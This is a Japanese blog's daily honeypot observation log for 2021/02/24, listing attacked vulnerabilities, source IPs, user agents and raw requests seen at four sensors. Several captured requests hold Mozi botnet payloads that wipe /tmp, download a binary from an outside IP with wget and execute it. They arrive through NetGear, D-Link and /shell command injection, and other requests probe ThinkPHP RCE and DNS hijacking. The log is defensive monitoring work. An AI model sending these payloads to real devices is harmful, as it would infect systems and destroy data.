コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/02/24 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2021/02/24分です。

特徴
共通

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
IDBTE4M CODE87によるスキャン行為
zgrabによるスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//117[.]247[.]203[.]40:57188/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:US

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
D-link製品へDNS hijackingを狙うアクセス
IDBTE4M CODE87によるスキャン行為
zgrabによるスキャン行為
WordPressへのスキャン行為
/[a-z0-9]\.(gz|tar|tar.bz2|txt|zip)に対してのスキャン
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//117[.]242[.]209[.]155:43376/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。

Location:SG

NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
Gh0stRATのような動き
を確認しました。

アクセス数推移

JP:総アクセス数:153 (前日比:-3)
US:総アクセス数:242 (前日比:+194)
UK:総アクセス数:161 (前日比:+128)
SG:総アクセス数:34 (前日比:-28)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.157.160.112 United States
1 18.185.43.236 United States
1 18.231.140.5 United States
3 20.52.131.71 United States
1 34.222.139.193 United States
1 37.49.229.191 Belize
22 45.155.205.108 Russia
1 52.63.134.16 United States
1 52.77.218.168 United States
1 59.97.175.244 India
2 61.219.11.153 Taiwan
1 91.239.130.31 United Kingdom
1 102.37.2.152 South Africa
1 104.211.12.39 United States
1 117.247.203.40 India
101 120.153.93.85 Australia
2 134.122.30.213 United States
1 139.162.145.250 Netherlands
1 157.245.122.221 United States
1 172.105.89.161 United States
2 178.62.80.38 United States
1 180.127.125.98 China
1 182.127.28.11 China
1 192.241.219.72 United States
1 194.61.55.248 Russia
1 203.212.210.140 India
1 218.101.202.186 South Korea

UserAgent一覧

件数 UserAgent
14 -
1 Hello, World
1 Hello, world
1 IDBTE4M CODE87
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x
5 curl/7.61.1
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
3 -
1 \x03
1 \x16\x03\x01
2 \x16\x03\x01\x02
2 \xbf\xbf\xaf\xaf~
7 GET /.env HTTP/1.1
5 GET /.git/HEAD HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]127[.]28[.]11:54859/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//117[.]247[.]203[.]40:57188/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//httpbin[.]org/ip HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.65.21.96 United States
181 5.8.10.202 Russia
1 13.56.249.110 United States
1 27.224.137.242 China
1 34.123.221.68 United States
1 37.49.229.191 Belize
22 45.155.205.108 Russia
2 46.101.15.242 United States
4 47.110.77.66 China
1 60.13.6.203 China
1 61.219.11.153 Taiwan
1 103.123.66.194 Indonesia
1 111.224.234.103 China
1 111.224.249.77 China
4 114.26.104.160 Taiwan
1 116.75.194.194 India
1 117.242.209.155 India
1 120.35.40.65 China
1 123.158.49.149 China
1 123.160.235.84 China
1 124.235.138.215 China
1 129.146.190.190 United States
1 134.209.76.15 United States
1 137.116.91.11 United States
1 139.162.145.250 Netherlands
1 172.105.89.161 United States
1 182.138.137.107 China
1 192.241.205.224 United States
1 195.154.62.232 France
1 220.200.154.72 China
3 222.186.136.150 China
1 223.166.74.172 China

UserAgent一覧

件数 UserAgent
11 -
2 Go-http-client/1.1
1 Hello, world
1 IDBTE4M CODE87
181 Mozilla/5.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.15) Gecko/20101027 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 curl/7.58.0
2 curl/7.61.1

リクエスト内容一覧

件数 Method Request Protocol
1 -
2 \x16\x03\x01
1 \x16\x03\x01\x02
1 \xbf\xbf\xaf\xaf~
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
4 GET /.env HTTP/1.1
2 GET /.git/HEAD HTTP/1.1
1 GET /0.gz HTTP/1.1
1 GET /0.tar HTTP/1.1
1 GET /0.tar.bz2 HTTP/1.1
1 GET /0.txt HTTP/1.1
1 GET /0.zip HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /1.gz HTTP/1.1
1 GET /1.tar HTTP/1.1
1 GET /1.tar.bz2 HTTP/1.1
1 GET /1.txt HTTP/1.1
1 GET /1.zip HTTP/1.1
1 GET /2.gz HTTP/1.1
1 GET /2.tar HTTP/1.1
1 GET /2.tar.bz2 HTTP/1.1
1 GET /2.txt HTTP/1.1
1 GET /2.zip HTTP/1.1
1 GET /3.gz HTTP/1.1
1 GET /3.tar HTTP/1.1
1 GET /3.tar.bz2 HTTP/1.1
1 GET /3.txt HTTP/1.1
1 GET /3.zip HTTP/1.1
1 GET /4.gz HTTP/1.1
1 GET /4.tar HTTP/1.1
1 GET /4.tar.bz2 HTTP/1.1
1 GET /4.txt HTTP/1.1
1 GET /4.zip HTTP/1.1
1 GET /5.gz HTTP/1.1
1 GET /5.tar HTTP/1.1
1 GET /5.tar.bz2 HTTP/1.1
1 GET /5.txt HTTP/1.1
1 GET /5.zip HTTP/1.1
1 GET /6.gz HTTP/1.1
1 GET /6.tar HTTP/1.1
1 GET /6.tar.bz2 HTTP/1.1
1 GET /6.txt HTTP/1.1
1 GET /6.zip HTTP/1.1
1 GET /7.gz HTTP/1.1
1 GET /7.tar HTTP/1.1
1 GET /7.tar.bz2 HTTP/1.1
1 GET /7.txt HTTP/1.1
1 GET /7.zip HTTP/1.1
1 GET /8.gz HTTP/1.1
1 GET /8.tar HTTP/1.1
1 GET /8.tar.bz2 HTTP/1.1
1 GET /8.txt HTTP/1.1
1 GET /8.zip HTTP/1.1
1 GET /9.gz HTTP/1.1
1 GET /9.tar HTTP/1.1
1 GET /9.tar.bz2 HTTP/1.1
1 GET /9.txt HTTP/1.1
1 GET /9.zip HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /a.gz HTTP/1.1
1 GET /a.tar HTTP/1.1
1 GET /a.tar.bz2 HTTP/1.1
1 GET /a.txt HTTP/1.1
1 GET /a.zip HTTP/1.1
1 GET /b.gz HTTP/1.1
1 GET /b.tar HTTP/1.1
1 GET /b.tar.bz2 HTTP/1.1
1 GET /b.txt HTTP/1.1
1 GET /b.zip HTTP/1.1
1 GET /c.gz HTTP/1.1
1 GET /c.tar HTTP/1.1
1 GET /c.tar.bz2 HTTP/1.1
1 GET /c.txt HTTP/1.1
1 GET /c.zip HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /d.gz HTTP/1.1
1 GET /d.tar HTTP/1.1
1 GET /d.tar.bz2 HTTP/1.1
1 GET /d.txt HTTP/1.1
1 GET /d.zip HTTP/1.1
1 GET /dnscfg.cgi?dnsPrimary=192.95.59.130&dnsSecondary8.8.4.4&dnsDynamic=0&dnsRefresh=1 HTTP/1.1
1 GET /e.gz HTTP/1.1
1 GET /e.tar HTTP/1.1
1 GET /e.tar.bz2 HTTP/1.1
1 GET /e.txt HTTP/1.1
1 GET /e.zip HTTP/1.1
1 GET /f.gz HTTP/1.1
1 GET /f.tar HTTP/1.1
1 GET /f.tar.bz2 HTTP/1.1
1 GET /f.txt HTTP/1.1
1 GET /f.zip HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /g.gz HTTP/1.1
1 GET /g.tar HTTP/1.1
1 GET /g.tar.bz2 HTTP/1.1
1 GET /g.txt HTTP/1.1
1 GET /g.zip HTTP/1.1
1 GET /h.gz HTTP/1.1
1 GET /h.tar HTTP/1.1
1 GET /h.tar.bz2 HTTP/1.1
1 GET /h.txt HTTP/1.1
1 GET /h.zip HTTP/1.1
1 GET /i.gz HTTP/1.1
1 GET /i.tar HTTP/1.1
1 GET /i.tar.bz2 HTTP/1.1
1 GET /i.txt HTTP/1.1
1 GET /i.zip HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /j.gz HTTP/1.1
1 GET /j.tar HTTP/1.1
1 GET /j.tar.bz2 HTTP/1.1
1 GET /j.txt HTTP/1.1
1 GET /j.zip HTTP/1.1
2 GET /jenkins/login HTTP/1.0
1 GET /k.gz HTTP/1.1
1 GET /k.tar HTTP/1.1
1 GET /k.tar.bz2 HTTP/1.1
1 GET /k.txt HTTP/1.1
1 GET /k.zip HTTP/1.1
1 GET /l.gz HTTP/1.1
1 GET /l.tar HTTP/1.1
1 GET /l.tar.bz2 HTTP/1.1
1 GET /l.txt HTTP/1.1
1 GET /l.zip HTTP/1.1
2 GET /login HTTP/1.0
1 GET /m.gz HTTP/1.1
1 GET /m.tar HTTP/1.1
1 GET /m.tar.bz2 HTTP/1.1
1 GET /m.txt HTTP/1.1
1 GET /m.zip HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /n.gz HTTP/1.1
1 GET /n.tar HTTP/1.1
1 GET /n.tar.bz2 HTTP/1.1
1 GET /n.txt HTTP/1.1
1 GET /n.zip HTTP/1.1
1 GET /o.gz HTTP/1.1
1 GET /o.tar HTTP/1.1
1 GET /o.tar.bz2 HTTP/1.1
1 GET /o.txt HTTP/1.1
1 GET /o.zip HTTP/1.1
1 GET /p.gz HTTP/1.1
1 GET /p.tar HTTP/1.1
1 GET /p.tar.bz2 HTTP/1.1
1 GET /p.txt HTTP/1.1
1 GET /p.zip HTTP/1.1
1 GET /q.gz HTTP/1.1
1 GET /q.tar HTTP/1.1
1 GET /q.tar.bz2 HTTP/1.1
1 GET /q.txt HTTP/1.1
1 GET /q.zip HTTP/1.1
1 GET /r.gz HTTP/1.1
1 GET /r.tar HTTP/1.1
1 GET /r.tar.bz2 HTTP/1.1
1 GET /r.txt HTTP/1.1
1 GET /r.zip HTTP/1.1
1 GET /s.gz HTTP/1.1
1 GET /s.tar HTTP/1.1
1 GET /s.tar.bz2 HTTP/1.1
1 GET /s.txt HTTP/1.1
1 GET /s.zip HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//116[.]75[.]194[.]194:38765/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//117[.]242[.]209[.]155:43376/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /t.gz HTTP/1.1
1 GET /t.tar HTTP/1.1
1 GET /t.tar.bz2 HTTP/1.1
1 GET /t.txt HTTP/1.1
1 GET /t.zip HTTP/1.1
1 GET /u.gz HTTP/1.1
1 GET /u.tar HTTP/1.1
1 GET /u.tar.bz2 HTTP/1.1
1 GET /u.txt HTTP/1.1
1 GET /u.zip HTTP/1.1
1 GET /v.gz HTTP/1.1
1 GET /v.tar HTTP/1.1
1 GET /v.tar.bz2 HTTP/1.1
1 GET /v.txt HTTP/1.1
1 GET /v.zip HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w.gz HTTP/1.1
1 GET /w.tar HTTP/1.1
1 GET /w.tar.bz2 HTTP/1.1
1 GET /w.txt HTTP/1.1
1 GET /w.zip HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-login.php HTTP/1.1
1 GET /x.gz HTTP/1.1
1 GET /x.tar HTTP/1.1
1 GET /x.tar.bz2 HTTP/1.1
1 GET /x.txt HTTP/1.1
1 GET /x.zip HTTP/1.1
1 GET /xaa HTTP/1.1
1 GET /y.gz HTTP/1.1
1 GET /y.tar HTTP/1.1
1 GET /y.tar.bz2 HTTP/1.1
1 GET /y.txt HTTP/1.1
1 GET /y.zip HTTP/1.1
1 GET /z.gz HTTP/1.1
1 GET /z.tar HTTP/1.1
1 GET /z.tar.bz2 HTTP/1.1
1 GET /z.txt HTTP/1.1
1 GET /z.zip HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
4 18.188.241.71 United States
1 37.49.229.191 Belize
22 45.155.205.108 Russia
10 49.232.11.17 China
1 52.250.58.212 United States
1 59.99.141.169 India
1 61.219.11.153 Taiwan
4 71.6.135.131 United States
1 91.241.19.60 Russia
105 138.219.40.138 Argentina
1 172.105.77.209 United States
1 172.105.89.161 United States
2 178.62.91.137 United States
1 178.72.78.88 Russia
1 192.241.205.56 United States
1 213.108.134.156 Russia
3 222.186.136.150 China

UserAgent一覧

件数 UserAgent
15 -
107 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Slackware Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.30 Safari/532.5
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
2 -
2 \x03
1 \x16\x03\x01
1 \x16\x03\x01\x02
1 \xbf\xbf\xaf\xaf~
1 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET //main.php HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Dumper HTTP/1.1
1 GET /MSD HTTP/1.1
1 GET /MySQL HTTP/1.1
1 GET /MySQLDumper HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /SQLite-Manager/main.php HTTP/1.1
1 GET /SQLite/SQLite-Manager/main.php HTTP/1.1
1 GET /SQLite/SQLite-manager/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.0.4/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.0.5/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.0.6/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.1.0/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.1.1/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.1.2/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.1.3/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.2.0/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.2.2/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.2.3/main.php HTTP/1.1
1 GET /SQLite/SQLiteManager-1.2.4/main.php HTTP/1.1
1 GET /SQLite/SQLitemanager/main.php HTTP/1.1
1 GET /SQLite/sqlite-manager/main.php HTTP/1.1
1 GET /SQLite/sqlitemanager/main.php HTTP/1.1
1 GET /SQLiteManager-1.0.4/main.php HTTP/1.1
1 GET /SQLiteManager-1.0.5/main.php HTTP/1.1
1 GET /SQLiteManager-1.0.6/main.php HTTP/1.1
1 GET /SQLiteManager-1.1.0/main.php HTTP/1.1
1 GET /SQLiteManager-1.1.1/main.php HTTP/1.1
1 GET /SQLiteManager-1.1.2/main.php HTTP/1.1
1 GET /SQLiteManager-1.1.3/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.0/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.2/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.3/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.4/main.php HTTP/1.1
2 GET /SQLiteManager/main.php HTTP/1.1
1 GET /SQlite/main.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /admin-console/login.seam HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /db/main.php HTTP/1.1
1 GET /dbmanager/main.php HTTP/1.1
1 GET /dump HTTP/1.1
1 GET /dumper HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /hudson/login HTTP/1.1
1 GET /hudson/script HTTP/1.1
1 GET /index.php HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /invoker/JMXInvokerServlet HTTP/1.1
1 GET /jenkins HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /jenkins/login HTTP/1.0
1 GET /jenkins/script HTTP/1.1
1 GET /jmx-console/ HTTP/1.1
1 GET /login HTTP/1.1
1 GET /login HTTP/1.0
1 GET /manager/html HTTP/1.1
1 GET /manager/html/ HTTP/1.1
1 GET /manager/main.php HTTP/1.1
1 GET /msd HTTP/1.1
1 GET /msd1.21 HTTP/1.1
1 GET /msd1.24.4 HTTP/1.1
1 GET /msd1.24stable HTTP/1.1
1 GET /msddump HTTP/1.1
1 GET /msddumper HTTP/1.1
1 GET /msdump HTTP/1.1
1 GET /mySQLDumper HTTP/1.1
1 GET /mySQLmanager HTTP/1.1
1 GET /mySqlDumper HTTP/1.1
1 GET /mysql HTTP/1.1
1 GET /mysql/ HTTP/1.1
1 GET /mysqldump HTTP/1.1
1 GET /mysqldumper HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /script HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sql HTTP/1.1
1 GET /sql/main.php HTTP/1.1
1 GET /sqladmin HTTP/1.1
1 GET /sqlite-manager/main.php HTTP/1.1
1 GET /sqlite/SQLite-Manager/main.php HTTP/1.1
1 GET /sqlite/SQLite-manager/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.0.4/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.0.5/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.0.6/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.1.0/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.1.1/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.1.2/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.1.3/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.2.0/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.2.2/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.2.3/main.php HTTP/1.1
1 GET /sqlite/SQLiteManager-1.2.4/main.php HTTP/1.1
1 GET /sqlite/SQLitemanager/main.php HTTP/1.1
1 GET /sqlite/main.php HTTP/1.1
1 GET /sqlite/sqlite-manager/main.php HTTP/1.1
1 GET /sqlite/sqlitemanager/main.php HTTP/1.1
1 GET /sqlitemanager-1.0.4/main.php HTTP/1.1
1 GET /sqlitemanager-1.0.5/main.php HTTP/1.1
1 GET /sqlitemanager-1.0.6/main.php HTTP/1.1
1 GET /sqlitemanager-1.1.0/main.php HTTP/1.1
1 GET /sqlitemanager-1.1.1/main.php HTTP/1.1
1 GET /sqlitemanager-1.1.2/main.php HTTP/1.1
1 GET /sqlitemanager-1.1.3/main.php HTTP/1.1
1 GET /sqlitemanager-1.2.0/main.php HTTP/1.1
1 GET /sqlitemanager-1.2.2/main.php HTTP/1.1
1 GET /sqlitemanager-1.2.3/main.php HTTP/1.1
1 GET /sqlitemanager-1.2.4/main.php HTTP/1.1
2 GET /sqlitemanager/main.php HTTP/1.1
1 GET /sqlmanager HTTP/1.1
1 GET /sqlmanager/main.php HTTP/1.1
1 GET /sqlweb HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web-console/ HTTP/1.1
1 GET /websql HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
2 GET http[:]//fuwu[.]sogou[.]com/404/index.html HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
11 45.155.205.108 Russia
1 45.229.55.66 Brazil
4 47.110.77.66 China
2 59.16.243.198 South Korea
1 66.240.205.34 United States
2 77.247.127.185 United Kingdom
1 120.79.156.2 China
4 121.4.14.107 China
4 123.207.22.131 China
2 159.65.206.162 United States
1 168.61.182.252 United States
1 222.138.137.41 China

UserAgent一覧

件数 UserAgent
12 -
3 Go-http-client/1.1
2 Mozilla/5.0
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
2 \x16\x03\x01\x02
1 \xbf\xbf\xaf\xaf~
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 CONNECT m[.]naver[.]com/:443 HTTP/1.1
1 CONNECT www[.]naver[.]com/:80 HTTP/1.1
2 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
3 GET /jenkins/login HTTP/1.0
3 GET /login HTTP/1.0
3 GET /manager/html HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
3 GET /wp-login.php HTTP/1.1
